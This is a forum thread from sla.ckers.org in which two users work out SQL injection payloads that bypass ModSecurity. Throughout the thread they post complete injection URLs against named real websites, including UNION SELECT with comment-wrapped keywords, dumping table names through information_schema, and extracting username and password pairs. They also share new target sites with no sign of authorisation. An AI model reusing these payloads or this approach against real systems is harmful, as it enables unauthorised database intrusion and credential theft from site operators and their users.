Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Error 406 - Not Acceptable, blocked by Mod Security
Posted by: kenjii
Date: November 05, 2013 10:31AM

hi all

i have a problem during sql injection on a website :
Error 406 - Not Acceptable

An error has occurred. Generally a 406 error is caused because a request has been blocked by Mod Security. If you believe that your request has been blocked by mistake please contact the web site owner.

i just try UNION SELECT 1,2,3,4,5,6,7--

a tool like havij can bypass this but i don't find how do it manualy in url

can somebody help me?

Options: ReplyQuote
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 05, 2013 12:06PM

http://www.exploit-db.com/papers/17934/

it's work, i tried

Options: ReplyQuote
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: kenjii
Date: November 05, 2013 02:21PM

hi and thx it seem to work fine :)


but i have a new problem now i can't see column :(

i got many error like :
Warning: mysql_num_rows():
Warning: mysql_fetch_array()

this is 1 of the link where i try to inject

http://comm.icpdas-usa.com/products.php?PID=3487+/*!order*/+/*!by*/+100+--

i also try with union select
http://comm.icpdas-usa.com/products.php?PID=3487+/*!union*/+/*!select*/+1,2,3,4,5+--

but the error are still the same

did i make a mistake in the syntaxe or ?

sorry for my bad english :s

Options: ReplyQuote
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 06, 2013 08:21AM

it's a nice problem :S

i tried this http://comm.icpdas-usa.com/products.php?PID=348+/*!/**/aND/**/*/+1/*!=*/1

and seems to work, if u change and 1=2 the page turn blank

now i'm working for the union select

Options: ReplyQuote
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 06, 2013 09:03AM

this is the url that use that fucking op havij

http://comm.icpdas-usa.com//products.php?PID=999999.9+%2F*!30000union+all+select+0x31303235343830303536%2Cconcat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536*%2F--

to extract db name, but is so hard to understand o_O never did a query so pro :D

Options: ReplyQuote
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 06, 2013 09:24AM

yessss
------> http://comm.icpdas-usa.com/products.php?PID=999999+/*!unIoN*/+/*!All*/+/*!seLEct*/+1,2,3,4,5,6,7 <------

http://comm.icpdas-usa.com/products.php?PID=999999+/*!unIoN*/+/*!All*/+/*!seLEct*/+1,2,3,group_concat(/*!table_name*/),5,6,7+from+/*!inforMAtion_schema*/.tables+/*!wHEre*/+/*!taBLe_scheMA*/like+database()

was a pleasure :), my first mod_security injection :)))



Edited 3 time(s). Last edit at 11/06/2013 09:49AM by tascio.

Options: ReplyQuote
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: kenjii
Date: November 06, 2013 10:08AM

wow thank's you very nice
i will take some time for understand all of this i have many similar website
that op havij can get and not me :)

again thank you



Edited 1 time(s). Last edit at 11/06/2013 10:15AM by kenjii.

Options: ReplyQuote
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 06, 2013 10:49AM

to bypass mod_security u just should enclose the only MySql commands between /*! */

oh many similar websites :D, if u have any problem post post! are usefull also to me to learn more :D

Options: ReplyQuote
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: kenjii
Date: November 06, 2013 11:02AM

it seem i need to get more skill for understand all :P

http://comm.icpdas-usa.com/products.php?PID=348+/*!/**/aND/**/*/+1/*!=*/1

this work for me too but i can't do order by for get columns number...
(with order by 1 no error, order by 2 i start have error..finaly i think to have understand but not sure..)

on this :
http://comm.icpdas-usa.com/products.php?PID=999999+/*!unIoN*/+/*!All*/+/*!seLEct*/+1,2,3,4,5,6,7

i can see column vul is 4 but when i look to havij it say that

Turning on mod_security bypass
Selected Column Count is 3
Valid String Column is 2

O_O

also why now the pid is 999999 instead of 3487 (i mean why it don't work with the pid normal)

i have many question like this if you want :P

if you want another website look at this one

http://www.yubet.ca/item.php?id=117

the same i can't get it manualy but havij can :'(



Edited 3 time(s). Last edit at 11/06/2013 11:13AM by kenjii.

Options: ReplyQuote
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 06, 2013 11:47AM

for the first question:
http://comm.icpdas-usa.com/products.php?PID=348+/*!order*/+/*!by*/+6 show us the product

http://comm.icpdas-usa.com/products.php?PID=348+/*!order*/+/*!by*/+7 show us the product

http://comm.icpdas-usa.com/products.php?PID=348+/*!order*/+/*!by*/+8 dont show us the product then our union select have 7 fields

for the columns, use havij just for help but dont care about results he is mad :O
and too op for us :D

for the pid=99999, union select to work need a non-existent^^ variable, often i use the ' for example id=12' union all select ....
or the - id=-21 union all select.....
if u use a variable that exist in the database, the db show u the page and not the open doors like our 4 in our injection

http://sechow.com/bricks/docs/content-page-1.html <-- explained very well



Edited 1 time(s). Last edit at 11/06/2013 11:48AM by tascio.

Options: ReplyQuote
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 06, 2013 12:16PM

uhm open a new topic for this http://www.yubet.ca/item.php?id=117
it's curious

http://www.yubet.ca/item.php?id=117+group+by+64-- no error
http://www.yubet.ca/item.php?id=117+group+by+65-- db error
then there are 64 fields in union select ?_?_? :O

http://www.yubet.ca/item.php?id=99999+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64--

it's work but returns an error :O wtf?_?

open a new topic for help

Options: ReplyQuote
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: kenjii
Date: November 06, 2013 01:08PM

thank you again in 2 reply from you i have learn more than in everything i read before :)

if you have other paper or tutorial for learn i'am interested :)

here is nother site with something strange for me i let you see i got some interesting error

http://www.dragonsphereny.com/product_list.php?pid=14

Options: ReplyQuote
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: kenjii
Date: November 06, 2013 04:27PM

I have another question, why when i look at data in 1 column i can see some info and when i select 2 columns i get 0 info ?

I mean when i select user i get some username (not all just some...)and when i select password i get some pass but when i ask for user and pass i see nothing


it do that in havij too another exemple :

when i choose id i get all id
if i ask for username i have all user name
but if i ask for id and username i got nothing(0 id and 0 username)

I know there is data in coz i can see it if i choose only 1 column
and sometime i whant see data in 1 column and i see nothing but if i choose 2 column i can see data

is there something like a protection or a filter to bypass for see the 2 columns?



Edited 1 time(s). Last edit at 11/06/2013 04:30PM by kenjii.

Options: ReplyQuote
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: tascio
Date: November 08, 2013 04:27AM

try this syntax
union all select 1,2,group_concat(admin,password),4,5 from users

un can add special chars for an easier reading
union all select 1,2,group_concat(admin,0x23,password,0x20),4,5 from users

like this
http://www.gallina.it/it/prodotti/index.php?prod=999+union+all+select+1,2,3,4,5,group_concat(co_nome,0x23,co_password,0x20),7,8,9,10,11,12,13+from+utenti

i added special char # (0x23) beteween username and password and a free space (0x20) to divide rows

Options: ReplyQuote
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: kenjii
Date: November 08, 2013 06:36AM

ok thank you me i know 0x3a for add : , it help me to read :)

Options: ReplyQuote
Re: Error 406 - Not Acceptable, blocked by Mod Security
Posted by: guantouqiang
Date: April 08, 2014 10:36AM

good job

Options: ReplyQuote


Sorry, only registered users may post in this forum.